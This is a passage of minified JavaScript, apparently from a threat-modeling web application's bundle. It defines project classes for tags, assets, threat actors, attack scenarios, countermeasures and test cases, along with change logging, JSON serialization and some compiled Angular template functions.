null==a||a.GetAttackScenarios().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromAttackScenario,Param:n})),null==a||a.GetCountermeasures().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromCountermeasure,Param:n})),null==a||a.GetMyTagCharts().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromMyTagChart,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{(n.Type==li.RemoveMyTagFromAttackScenario||n.Type==li.RemoveMyTagFromCountermeasure||n.Type==li.RemoveMyTagFromMyTagChart)&&n.Param.RemoveMyTag(this.ID)})}static FromJSON(a,e,i){return new pM(a,e,i)}}class wT extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.myTagIDs||(this.Data.myTagIDs=[]),this.Type||(this.Type=ad.Severity)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}get Type(){return this.Data.Type}set Type(a){this.Data.Type=a}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}FindReferences(a,e){return[]}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{})}static FromJSON(a,e,i){return new wT(a,e,i)}}class mf extends Ln{constructor(a,e){if(super(a),this.fileChanged=!1,this.changeLog=[],this.assetGroups=[],this.myData=[],this.threatActors=[],this.systemThreats=[],this.contextElementMap=new Map,this.dfdElementMap=new Map,this.diagrams=[],this.stacks=[],this.componentMap=new Map,this.attackScenarioMap=new Map,this.countermeasureMap=new Map,this.mitigationProcesses=[],this.checklists=[],this.testCases=[],this.myTags=[],this.myTagCharts=[],this.exportTemplates=[],this.AssetsChanged=new Tt,this.MyDatasChanged=new Tt,this.DevicesChanged=new Tt,this.MobileAppsChanged=new Tt,this.ContextElementsChanged=new Tt,this.DFDElementsChanged=new Tt,this.MyComponentsChanged=new Tt,this.DiagramsChanged=new Tt,this.ThreatActorsChanged=new Tt,this.SystemThreatsChanged=new Tt,this.AttackScenariosChanged=new Tt,this.CountermeasuresChanged=new Tt,this.MitigationProcessesChanged=new Tt,this.TestCasesChanged=new Tt,this.deepDiffMapper={KEY_CHANGETYP:"cT",KEY_OLDDATA:"oD",KEY_NEWDATA:"nD",map:function(n,r){if(this.isFunction(n)||this.isFunction(r))throw"Invalid argument. Function given, object expected.";if(this.isValue(n)||this.isValue(r))return{cT:this.compareValues(n,r),oD:n,nD:r};var c={};for(var d in n)if(!this.isFunction(n[d])){var T=void 0;void 0!==r[d]&&(T=r[d]),c[d]=this.map(n[d],T)}for(var d in r)this.isFunction(r[d])||void 0!==c[d]||(c[d]=this.map(void 0,r[d]));return c},compareValues:function(n,r){return n===r||this.isDate(n)&&this.isDate(r)&&n.getTime()===r.getTime()?0:void 0===n?Ja.Added:void 0===r?Ja.Removed:Ja.Changed},isFunction:function(n){return"[object Function]"===Object.prototype.toString.call(n)},isArray:function(n){return"[object Array]"===Object.prototype.toString.call(n)},isDate:function(n){return"[object Date]"===Object.prototype.toString.call(n)},isObject:function(n){return"[object Object]"===Object.prototype.toString.call(n)},isValue:function(n){return!this.isObject(n)&&!this.isArray(n)}},this.Data.Name||(this.Data.Name="New Project"),this.Data.Version||(this.Data.Version=D5.ProjectVersion),this.Data.ProgressTracker||(this.Data.ProgressTracker={}),this.Data.Participants||(this.Data.Participants=[]),this.Data.Tasks||(this.Data.Tasks=[]),this.Data.Notes||(this.Data.Notes=[]),this.Data.Settings||(this.Data.Settings={ThreatActorToAttackScenario:!0}),this.config=e,!this.projectAssetGroupId){let n=this.InitializeNewAssetGroup(e);this.Data.projectAssetGroupId=n.ID}const i=(n,r,c,d,T)=>{if(this.projectCopy&&this.changeLog.findIndex(k=>k.ID==n.ID&&k.Type==n.Type)<0&&!this.changeLog.some(k=>k.ID==n.ID&&k.Type>n.Type))if(n.Type==Ja.Removed){const k=this.changeLog.find(Y=>Y.ID==n.ID);let q=null;if(k)q=k.Name;else{const Y=this.projectCopy[r].find(te=>te.ID==n.ID);if(Y){const te=c.FromJSON(Y,this,this.Config);q=te&&te.GetLongName?te.GetLongName():Y.Name}}q?this.changeLog.push({Title:T,Name:q,ID:n.ID,Type:n.Type}):console.error("Missing object")}else{const k=this[d](n.ID);if(k){let q=k.Name;k.GetLongName&&(q=k.GetLongName()),this.changeLog.push({Title:T,Name:q,ID:n.ID,Type:n.Type})}}};this.AssetsChanged.subscribe(n=>setTimeout(()=>{i(n,"assetGroups",Zl,"GetAssetGroup","general.Asset")},200)),this.DiagramsChanged.subscribe(n=>setTimeout(()=>{i(n,"diagrams",ns,"GetDiagram","general.Diagram")},200)),this.ContextElementsChanged.subscribe(n=>setTimeout(()=>{i(n,"contextElements",os,"GetContextElement","general.Element")},200)),this.DFDElementsChanged.subscribe(n=>setTimeout(()=>{i(n,"dfdElements",lc,"GetDFDElement","general.Element")},200)),this.MyComponentsChanged.subscribe(n=>setTimeout(()=>{i(n,"components",rf,"GetComponent","general.Component")},200)),this.SystemThreatsChanged.subscribe(n=>setTimeout(()=>{i(n,"systemThreats",hM,"GetSystemThreat","general.SystemThreat")},200)),this.ThreatActorsChanged.subscribe(n=>setTimeout(()=>{i(n,"threatActors",Gp,"GetThreatActor","general.ThreatActor")},200)),this.AttackScenariosChanged.subscribe(n=>setTimeout(()=>{i(n,"attackScenarios",Rc,"GetAttackScenario","general.AttackScenario")},200)),this.CountermeasuresChanged.subscribe(n=>setTimeout(()=>{i(n,"countermeasures",Jl,"GetCountermeasure","general.Countermeasure")},200)),this.MitigationProcessesChanged.subscribe(n=>setTimeout(()=>{i(n,"mitigationProcesses",Lp,"GetMitigationProcess","general.MitigationProcess")},200)),this.TestCasesChanged.subscribe(n=>setTimeout(()=>{i(n,"testCases",$g,"GetTestCase","general.TestCase")},200))}get projectAssetGroupId(){return this.Data.projectAssetGroupId}get Version(){return this.Data.Version}get TTModelerVersion(){return this.Data.TTModelerVersion}set TTModelerVersion(a){this.Data.TTModelerVersion=a}get ProgressTracker(){return this.Data.ProgressTracker}get ProgressStep(){return this.Data.ProgressStep}set ProgressStep(a){this.Data.ProgressStep=a}get FileChanged(){return this.fileChanged||this.Config.FileChanged}set FileChanged(a){this.fileChanged=a,a?this.DataChanged.emit():(this.changeLog=[],this.projectCopy=JSON.parse(JSON.stringify(this.ToJSON())))}get UserVersion(){return this.Data.UserVersion}set UserVersion(a){this.Data.UserVersion=a}get Participants(){return this.Data.Participants}set Participants(a){this.Data.Participants=a}get Tasks(){return this.Data.Tasks}set Tasks(a){this.Data.Tasks=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get Image(){return this.Data.Image}set Image(a){this.Data.Image=a}get Settings(){return this.Data.Settings}GetProjectName(){return Gi.FromCamelCase(this.Name.replace(".ttmp",""))}GetCharScope(){return this.charScope}GetObjImpact(){return this.objImpact}GetSysContext(){return this.sysContext}GetAssetGroups(){return this.assetGroups}GetProjectAssetGroup(){return this.GetAssetGroups().find(a=>a.ID==this.projectAssetGroupId)}GetMyDatas(){return this.myData}GetThreatActors(){return this.threatActors}GetThreatSources(){return this.threatSources}GetSystemThreats(){return this.systemThreats}GetContextElements(){return Array.from(this.contextElementMap,([a,e])=>e)}GetDFDElements(){return Array.from(this.dfdElementMap,([a,e])=>e)}GetDiagrams(){return this.diagrams}GetHWDFDiagrams(){return this.GetDiagrams().filter(a=>[xn.Hardware,xn.DataFlow].includes(a.DiagramType))}GetHWDiagrams(){return this.diagrams.filter(a=>a.DiagramType==xn.Hardware)}GetDFDiagrams(){return this.diagrams.filter(a=>a.DiagramType==xn.DataFlow)}GetStacks(){return this.stacks}GetDevices(){return this.GetContextElements().filter(a=>a.Type==Aa.Device&&a instanceof Ou)}GetMobileApps(){return this.GetContextElements().filter(a=>a.Type==Aa.MobileApp&&a instanceof cf)}GetComponents(){return Array.from(this.componentMap,([a,e])=>e)}GetAttackScenarios(){return Array.from(this.attackScenarioMap,([a,e])=>e)}GetAttackScenariosApplicable(){return this.GetAttackScenarios().filter(a=>![_o.NotApplicable,_o.Duplicate].includes(a.ThreatState))}GetAttackScenariosNotApplicable(){return this.GetAttackScenarios().filter(a=>[_o.NotApplicable,_o.Duplicate].includes(a.ThreatState))}GetCountermeasures(){return Array.from(this.countermeasureMap,([a,e])=>e)}GetCountermeasuresApplicable(){return this.GetCountermeasures().filter(a=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(a.MitigationState))}GetCountermeasuresNotApplicable(){return this.GetCountermeasures().filter(a=>[Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(a.MitigationState))}GetMitigationProcesses(){return this.mitigationProcesses}GetChecklists(){return this.checklists}GetTestCases(){return this.testCases}GetTesting(){return this.testing}get HasTesting(){return null!=this.testing}GetMyTags(){return this.myTags}GetMyTagCharts(){return this.myTagCharts}GetExportTemplates(){return this.exportTemplates}get Config(){return this.config}InitializeNewProject(){this.charScope=new dM({},this,this.config),this.objImpact=new mM({},this,this.config),this.sysContext=new pT({},this,this.config),this.threatSources=new uM({},this,this.config)}GetLog(){if(this.projectCopy){const a=this.ToJSON(),i=this.deepDiffMapper.map(this.projectCopy,a),n=c=>{Object.keys(c).forEach(d=>{const T=c[d];"object"==typeof T&&!Array.isArray(T)&&null!==T&&(0==Object.keys(T).length||this.deepDiffMapper.KEY_CHANGETYP in T&&0===T[this.deepDiffMapper.KEY_CHANGETYP]?delete c[d]:n(T),0==Object.keys(T).length&&delete c[d])})};n(i);const r=[];return Object.keys(i).forEach(c=>{"Data"===c?Object.keys(i[c]).forEach(d=>{r.push({ID:null,Title:d,Type:Ja.Changed})}):"config"===c?r.push({ID:null,Title:"side-nav.configuration",Type:Ja.Changed}):"charSope"===c?r.push({ID:null,Title:"dialog.transferproject.d.CharScope",Type:Ja.Changed}):"objImpact"===c?r.push({ID:null,Title:"dialog.transferproject.d.ObjImpact",Type:Ja.Changed}):"tagCharts"===c?r.push({ID:null,Title:"dialog.tagcharts.title",Type:Ja.Changed}):"exportTemplates"===c&&r.push({ID:null,Title:"pages.reporting.Templates",Type:Ja.Changed})}),[...this.changeLog,...r]}return[]}CreateDevice(){let a=os.Instantiate(Aa.Device,this,this.Config);return this.AddContextElement(a),this.DevicesChanged.emit({ID:a.ID,Type:Ja.Added}),a}CreateMobileApp(){let a=os.Instantiate(Aa.MobileApp,this,this.Config);return this.AddContextElement(a),this.MobileAppsChanged.emit({ID:a.ID,Type:Ja.Added}),a}AddContextElement(a){return!this.contextElementMap.has(a.ID)&&(this.contextElementMap.set(a.ID,a),!0)}DeleteContextElement(a){return!!this.contextElementMap.has(a.ID)&&(a.OnDelete(this,this.config),this.contextElementMap.delete(a.ID),this.ContextElementsChanged.emit({ID:a.ID,Type:Ja.Removed}),a instanceof Ou&&this.DevicesChanged.emit({ID:a.ID,Type:Ja.Removed}),a instanceof cf&&this.MobileAppsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetContextElement(a){return this.contextElementMap.get(a)}GetContextElementRefs(){return this.GetContextElements().filter(a=>a instanceof Ts||a instanceof Bg)}MoveItemInContextElements(a,e){this.moveItemInMap("contextElementMap",a,e)}GetAssetGroup(a){return this.assetGroups.find(e=>e.ID==a)}CreateAssetGroup(a){let e=new Zl({},this,this.Config);return this.assetGroups.push(e),e.Name=Gi.FindUniqueName("Asset Group",this.assetGroups.map(i=>i.Name)),null!=a&&a.AddAssetGroup(e),e.Number=0==this.GetNewAssets().length?"1":(Math.max(...this.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString(),e.IsNewAsset=!0,this.AssetsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteAssetGroup(a){const e=this.assetGroups.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.assetGroups.splice(e,1),this.AssetsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}InitializeNewAssetGroup(a){let e=(n,r)=>{let c=this.CreateMyData(r);return c.CopyFrom(n.Data),c.IsNewAsset=!1,c.Number=null,c},i=(n,r)=>{let c=this.CreateAssetGroup(r);return c.CopyFrom(n.Data),c.IsNewAsset=!1,c.Number=null,c.Data.assetGroupIDs=[],n.SubGroups.forEach(d=>{let T=i(d,c);c.AddAssetGroup(T)}),c.Data.associatedDataIDs=[],n.AssociatedData.forEach(d=>{let T=e(d,c);c.AddMyData(T)}),c};return i(a.AssetGroups,null)}GetMyData(a){return this.myData.find(e=>e.ID==a)}CreateMyData(a){let e=new Pu({},this,this.Config);return a&&a.AddMyData(e),this.myData.push(e),e.Name=Gi.FindUniqueName("Data",this.GetMyDatas().map(i=>i.Name)),e.Number=0==this.GetNewAssets().length?"1":(Math.max(...this.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString(),e.IsNewAsset=!0,this.MyDatasChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteMyData(a){const e=this.myData.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myData.splice(e,1),this.MyDatasChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetNewAssets(){return[...this.GetAssetGroups(),...this.GetMyDatas()].filter(a=>a.IsNewAsset)}GetThreatActor(a){return this.threatActors.find(e=>e.ID==a)}CreateThreatActor(){const a=new Gp({},this,this.Config);return a.Name=Gi.FindUniqueName("Threat Actor",this.threatActors.map(e=>e.Name)),a.Likelihood=dr.Medium,a.Number=0==this.GetThreatActors().length?"1":(Math.max(...this.GetThreatActors().map(e=>Number(e.Number)))+1).toString(),this.threatActors.push(a),this.ThreatActorsChanged.emit({ID:a.ID,Type:Ja.Added}),a}DeleteThreatActor(a){const e=this.threatActors.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.threatActors.splice(e,1),this.ThreatActorsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetSystemThreat(a){return this.systemThreats.find(e=>e.ID==a)}CreateSystemThreat(a){let e=new hM({},this,this.Config);return e.Name=Gi.FindUniqueName(a?a.Name:"Threat",this.GetSystemThreats().map(i=>i.Name)),e.ThreatCategory=a,e.Number=0==this.GetSystemThreats().length?"1":(Math.max(...this.GetSystemThreats().map(i=>Number(i.Number)))+1).toString(),this.systemThreats.push(e),this.SystemThreatsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteSystemThreat(a){const e=this.systemThreats.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.systemThreats.splice(e,1),this.SystemThreatsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}AddDFDElement(a){return!this.dfdElementMap.has(a.ID)&&(this.dfdElementMap.set(a.ID,a),this.DFDElementsChanged.emit({ID:a.ID,Type:Ja.Added}),!0)}DeleteDDFElement(a){return!!this.dfdElementMap.has(a.ID)&&(a.OnDelete(this,this.config),this.dfdElementMap.delete(a.ID),this.DFDElementsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetDFDElement(a){return this.dfdElementMap.get(a)}GetDFDElementRefs(){return this.GetDFDElements().filter(a=>a instanceof td||a instanceof zm)}FindDeviceOfDiagram(a){return this.GetDevices().find(e=>e.HardwareDiagram.ID==a.ID)}CreateDiagram(a){let e;a==xn.Hardware||a==xn.DataFlow?e=new Vg({},this,this.Config):(a==xn.Context||a==xn.UseCase)&&(e=new b2({},this,this.Config)),e.DiagramType=a;let i="Context";return a==xn.UseCase?i="Use Case":a==xn.Hardware?i="Hardware":a==xn.DataFlow&&(i="Data Flow"),e.Name=Gi.FindUniqueName(i+" Diagram",this.diagrams.filter(n=>n.DiagramType==a).map(n=>n.Name)),this.diagrams.push(e),this.DiagramsChanged.emit({ID:e.ID,Type:Ja.Added}),e}GetDiagram(a){return this.diagrams.find(e=>e.ID==a)}DeleteDiagram(a){const e=this.diagrams.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.diagrams.splice(e,1),this.DiagramsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}FindDiagramOfElement(a){return this.GetDiagrams().find(e=>{var i;return null===(i=e.Elements)||void 0===i?void 0:i.GetChildrenFlat().some(n=>n.ID==a)})}AddComponent(a){return!this.componentMap.has(a.ID)&&(this.componentMap.set(a.ID,a),!0)}GetComponent(a){return this.componentMap.get(a)}CreateComponent(a){let e=new rf({},a,this,this.Config);return this.componentMap.set(e.ID,e),this.MyComponentsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteComponent(a){return!!this.componentMap.has(a.ID)&&(a.OnDelete(this,this.config),this.componentMap.delete(a.ID),this.AssetsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetStack(a){return this.stacks.find(e=>e.ID==a)}CreateStack(a){let e=new Om({},this,this.Config);return e.ComponentTypeID=a,this.stacks.push(e),e}DeleteStack(a){const e=this.stacks.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.stacks.splice(e,1)),e>=0}GetAttackScenario(a){return this.attackScenarioMap.get(a)}CreateAttackScenario(a,e){let i=new Rc({},this,this.Config);return i.IsGenerated=e,i.Number=0==this.GetAttackScenarios().length?"1":(Math.max(...this.GetAttackScenarios().map(n=>Number(n.Number)))+1).toString(),i.ViewID=a,this.attackScenarioMap.set(i.ID,i),this.AttackScenariosChanged.emit({ID:i.ID,Type:Ja.Added}),i}DeleteAttackScenario(a){return!!this.attackScenarioMap.has(a.ID)&&(a.OnDelete(this,this.config),this.attackScenarioMap.delete(a.ID),this.AttackScenariosChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}CleanUpGeneratedAttackScenarios(){this.attackScenarioMap.forEach(a=>{a.IsGenerated&&this.attackScenarioMap.delete(a.ID)})}MoveItemAttackScenario(a,e){this.moveItemInMap("attackScenarioMap",a,e)}GetCountermeasure(a){return this.countermeasureMap.get(a)}CreateCountermeasure(a,e){let i=new Jl({},this,this.Config);return i.IsGenerated=e,i.Number=0==this.GetCountermeasures().length?"1":(Math.max(...this.GetCountermeasures().map(n=>Number(n.Number)))+1).toString(),i.ViewID=a,this.countermeasureMap.set(i.ID,i),this.CountermeasuresChanged.emit({ID:i.ID,Type:Ja.Added}),i}DeleteCountermeasure(a){return!!this.countermeasureMap.has(a.ID)&&(a.OnDelete(this,this.config),this.countermeasureMap.delete(a.ID),this.CountermeasuresChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}MoveItemCountermeasures(a,e){this.moveItemInMap("countermeasureMap",a,e)}GetMitigationProcess(a){return this.mitigationProcesses.find(e=>e.ID==a)}CreateMitigationProcess(){let a=new Lp({},this,this.Config);return a.Number=0==this.mitigationProcesses.length?"1":(Math.max(...this.mitigationProcesses.map(e=>Number(e.Number)))+1).toString(),this.mitigationProcesses.push(a),a.Name=Gi.FindUniqueName("Mitigation Process",this.GetMitigationProcesses().map(e=>e.Name)),this.MitigationProcessesChanged.emit({ID:a.ID,Type:Ja.Added}),a}DeleteMitigationProcess(a){const e=this.mitigationProcesses.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.mitigationProcesses.splice(e,1),this.MitigationProcessesChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetChecklist(a){return this.checklists.find(e=>e.ID==a)}CreateChecklist(a,e){let i=new CM({},e,this,this.Config);return i.Name=e.Name,i.Description=e.Description,a.AddChecklist(i),this.checklists.push(i),i}DeleteChecklist(a){const e=this.checklists.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.checklists.splice(e,1)),e>=0}GetTestCase(a){return this.testCases.find(e=>e.ID==a)}CreateTestCase(){const a=new $g({},this,this.Config);return a.Name=Gi.FindUniqueName("Test Case",this.testCases.map(e=>e.Name)),a.Number=0==this.GetTestCases().length?"1":(Math.max(...this.GetTestCases().map(e=>Number(e.Number)))+1).toString(),this.testCases.push(a),this.testing.AddTestCase(a),this.TestCasesChanged.emit({Type:Ja.Added,ID:a.ID}),a}DeleteTestCase(a){const e=this.testCases.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.testCases.splice(e,1),this.TestCasesChanged.emit({Type:Ja.Removed,ID:a.ID})),e>=0}CreateTesting(){this.testing||(this.testing=new fM({},this,this.config))}DeleteTesting(){this.testing&&(this.testing.OnDelete(this,this.config),this.testing=null)}GetExportTemplate(a){return this.exportTemplates.find(e=>e.ID==a)}CreateExportTemplate(){let a=new xT({},this,this.Config);return a.Name=Gi.FindUniqueName("Export Template",this.GetExportTemplates().map(e=>e.Name)),this.exportTemplates.push(a),a}DeleteExportTemplate(a){const e=this.exportTemplates.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.exportTemplates.splice(e,1)),e>=0}GetMyTag(a){return this.myTags.find(e=>e.ID==a)}CreateMyTag(){let a=new pM({},this,this.Config);return a.Name=Gi.FindUniqueName("Tag",this.GetMyTags().map(e=>e.Name)),this.myTags.push(a),a}DeleteMyTag(a){const e=this.myTags.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myTags.splice(e,1)),e>=0}GetMyTagChart(a){return this.myTagCharts.find(e=>e.ID==a)}CreateMyTagChart(){let a=new wT({},this,this.Config);return a.Name=Gi.FindUniqueName("Tag Chart",this.GetMyTagCharts().map(e=>e.Name)),this.myTagCharts.push(a),a}DeleteMyTagChart(a){const e=this.myTagCharts.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myTagCharts.splice(e,1)),e>=0}GetView(a){let e=this.GetDiagram(a);return e||(e=this.GetStack(a)),e}ConsistencyCheck(a){let e=[];const i=(r,c)=>{let d=[];r.forEach(T=>{var k,q;T.Number?d.includes(T.Number)?e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"multiNumber"),null===(q=T.GetDiagram())||void 0===q?void 0:q.Name,T.Number)):d.push(T.Number):e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"woNumber"),null===(k=T.GetDiagram())||void 0===k?void 0:k.Name,T.Name))})},n=(r,c)=>{let d=[];r.forEach(T=>{T.Number?d.includes(T.Number)?e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"multiNumber"),T.Number)):d.push(T.Number):e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"woNumber"),T.Name))})};return i(this.GetAttackScenarios(),"AS"),i(this.GetCountermeasures(),"CM"),n(this.GetMitigationProcesses(),"MP"),n(this.GetThreatActors(),"TS"),n(this.GetSystemThreats(),"ST"),n(this.GetTestCases(),"TC"),n(this.GetNewAssets(),"A"),e}moveItemInMap(a,e,i){let r=Array.from(this[a].entries());r.splice(i,0,r.splice(e,1)[0]),this[a]=new Map(r)}FindReferences(a,e){return null}OnDelete(a,e){}ToJSON(){var a;let e={Data:this.Data,charSope:this.charScope.ToJSON(),objImpact:this.objImpact.ToJSON(),sysContext:this.sysContext.ToJSON(),assetGroups:[],myData:[],threatActors:[],threatSources:this.threatSources.ToJSON(),systemThreats:[],contextElements:[],dfdElements:[],diagrams:[],stacks:[],components:[],attackScenarios:[],countermeasures:[],mitigationProcesses:[],checklists:[],testCases:[],testing:null===(a=this.testing)||void 0===a?void 0:a.ToJSON(),tags:[],tagCharts:[],exportTemplates:[],config:this.Config.ToJSON()};return this.assetGroups.forEach(i=>e.assetGroups.push(i.ToJSON())),this.myData.forEach(i=>e.myData.push(i.ToJSON())),this.threatActors.forEach(i=>e.threatActors.push(i.ToJSON())),this.systemThreats.forEach(i=>e.systemThreats.push(i.ToJSON())),this.contextElementMap.forEach(i=>e.contextElements.push(i.ToJSON())),this.dfdElementMap.forEach(i=>e.dfdElements.push(i.ToJSON())),this.diagrams.forEach(i=>e.diagrams.push(i.ToJSON())),this.stacks.forEach(i=>e.stacks.push(i.ToJSON())),this.componentMap.forEach(i=>e.components.push(i.ToJSON())),this.attackScenarioMap.forEach(i=>e.attackScenarios.push(i.ToJSON())),this.countermeasureMap.forEach(i=>e.countermeasures.push(i.ToJSON())),this.mitigationProcesses.forEach(i=>e.mitigationProcesses.push(i.ToJSON())),this.checklists.forEach(i=>e.checklists.push(i.ToJSON())),this.testCases.forEach(i=>e.testCases.push(i.ToJSON())),this.myTags.forEach(i=>e.tags.push(i.ToJSON())),this.myTagCharts.forEach(i=>e.tagCharts.push(i.ToJSON())),this.exportTemplates.forEach(i=>e.exportTemplates.push(i.ToJSON())),e}static FromJSON(a){var e,i,n,r,c,d,T,k,q,Y,te,pe,Re;const Fe=Wu.FromJSON(a.config),Ne=new mf(a.Data,Fe);return a.charSope&&(Ne.charScope=dM.FromJSON(a.charSope,Ne,Fe)),a.objImpact&&(Ne.objImpact=mM.FromJSON(a.objImpact,Ne,Fe)),null===(e=a.assetGroups)||void 0===e||e.forEach(et=>Ne.assetGroups.push(Zl.FromJSON(et,Ne,Fe))),null===(i=a.myData)||void 0===i||i.forEach(et=>Ne.myData.push(Pu.FromJSON(et,Ne,Fe))),null===(n=a.contextElements)||void 0===n||n.forEach(et=>Ne.contextElementMap.set(et.ID,os.FromJSON(et,Ne,Fe))),a.dfdElements.forEach(et=>Ne.dfdElementMap.set(et.ID,lc.FromJSON(et,Ne,Fe))),a.diagrams.forEach(et=>Ne.diagrams.push(ns.FromJSON(et,Ne,Fe))),a.sysContext&&(Ne.sysContext=pT.FromJSON(a.sysContext,Ne,Fe)),null===(r=a.threatActors)||void 0===r||r.forEach(et=>Ne.threatActors.push(Gp.FromJSON(et,Ne,Fe))),a.threatSources&&(Ne.threatSources=uM.FromJSON(a.threatSources,Ne,Fe)),null===(c=a.systemThreats)||void 0===c||c.forEach(et=>Ne.systemThreats.push(hM.FromJSON(et,Ne,Fe))),a.components.forEach(et=>Ne.componentMap.set(et.ID,rf.FromJSON(et,Ne,Fe))),a.stacks.forEach(et=>Ne.stacks.push(Om.FromJSON(et,Ne,Fe))),null===(d=a.attackScenarios)||void 0===d||d.forEach(et=>Ne.attackScenarioMap.set(et.ID,Rc.FromJSON(et,Ne,Fe))),null===(T=a.countermeasures)||void 0===T||T.forEach(et=>Ne.countermeasureMap.set(et.ID,Jl.FromJSON(et,Ne,Fe))),null===(k=a.mitigationProcesses)||void 0===k||k.forEach(et=>Ne.mitigationProcesses.push(Lp.FromJSON(et,Ne,Fe))),null===(q=a.checklists)||void 0===q||q.forEach(et=>Ne.checklists.push(CM.FromJSON(et,Ne,Fe))),null===(Y=a.testCases)||void 0===Y||Y.forEach(et=>Ne.testCases.push($g.FromJSON(et,Ne,Fe))),a.testing&&(Ne.testing=fM.FromJSON(a.testing,Ne,Fe)),null===(te=a.tags)||void 0===te||te.forEach(et=>Ne.myTags.push(pM.FromJSON(et,Ne,Fe))),null===(pe=a.tagCharts)||void 0===pe||pe.forEach(et=>Ne.myTagCharts.push(wT.FromJSON(et,Ne,Fe))),null===(Re=a.exportTemplates)||void 0===Re||Re.forEach(et=>Ne.exportTemplates.push(xT.FromJSON(et,Ne,Fe))),Ne.GetDFDElements().forEach(et=>{if(et instanceof Ys){let ut=et.GetChildren();ut.some(Ze=>null==Ze)&&(console.error("Uncleared reference"),et.Data.childrenIDs=ut.filter(Ze=>Ze).map(Ze=>Ze.ID))}}),Ne}}const sSe=["elementview"];function cSe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"app-container-tree",16,17),he("selectionChanged",function(n){return be(e),Me(B().selectedObject=n)})("filterChanged",function(n){return be(e),Me(B().filteredObject=n)}),u(),s(4,"\n              "),Mt()}if(2&t){const e=B();C(2),V("elements",e.GetContainer(e.selectedNode))("selectedElement",e.selectedObject)("filteredElement",e.filteredObject)}}function lSe(t,a){if(1&t){const e=Ye();s(0,"\n                    "),m(1,"table",21),he("mouseenter",function(){return be(e),Me(B().$implicit.isHovered=!0)})("mouseleave",function(){return be(e),Me(B().$implicit.isHovered=!1)})("dblclick",function(){return be(e),Me(B().$implicit.keepOpen=!0)}),s(2,"\n                      "),m(3,"tr"),s(4,"\n                        "),m(5,"td",22)(6,"mat-icon",23),s(7),u()(),s(8,"\n                        "),m(9,"td",24),s(10),u(),s(11,"\n                        "),m(12,"td",22)(13,"button",25),he("click",function(){be(e);const n=B().$implicit;return Me(B().RemoveTab(n))}),m(14,"mat-icon",23),s(15),u()()(),s(16,"\n                      "),u(),s(17,"\n                      "),m(18,"tr"),s(19,"\n                        "),m(20,"td",26),s(21),u(),s(22,"\n                      "),u(),s(23,"\n                    "),u(),s(24,"\n                  ")}if(2&t){const e=B().$implicit;C(7),ke(e.nav.icon),C(2),ri("font-style",e.keepOpen?"normal":"italic"),C(1),ke(e.label),C(5),ke(e.isHovered?"close":""),C(5),ri("font-style",e.keepOpen?"normal":"italic"),C(1),ke(e.nav.name())}}function dSe(t,a){if(1&t){const e=Ye();m(0,"app-model-info",37),he("refreshNodes",function(){return be(e),Me(B(3).createNodes())}),u()}}function mSe(t,a){1&t&&it(0,"app-char-scope",38),2&t&&V("charScope",B(2).$implicit.nav.data)}function uSe(t,a){1&t&&it(0,"app-obj-impact",39),2&t&&V("objImpact",B(2).$implicit.nav.data)}function hSe(t,a){1&t&&it(0,"app-threat-sources",40),2&t&&V("threatSources",B(2).$implicit.nav.data)}function fSe(t,a){1&t&&it(0,"app-threat-identification",41)}function pSe(t,a){if(1&t){const e=Ye();m(0,"app-device-assets",42),he("selectionChanged",function(n){return be(e),Me(B(3).selectedObject=n)}),u()}if(2&t){const e=B(2).$implicit,i=B();V("assetGroup",e.nav.data)("selectedObject",i.selectedObject)}}function _Se(t,a){if(1&t){const e=Ye();m(0,"app-diagram",43),he("selectionChanged",function(n){return be(e),Me(B(3).selectedObject=n)})("navTreeChanged",function(){return be(e),Me(B(3).createNodes())}),u()}if(2&t){const 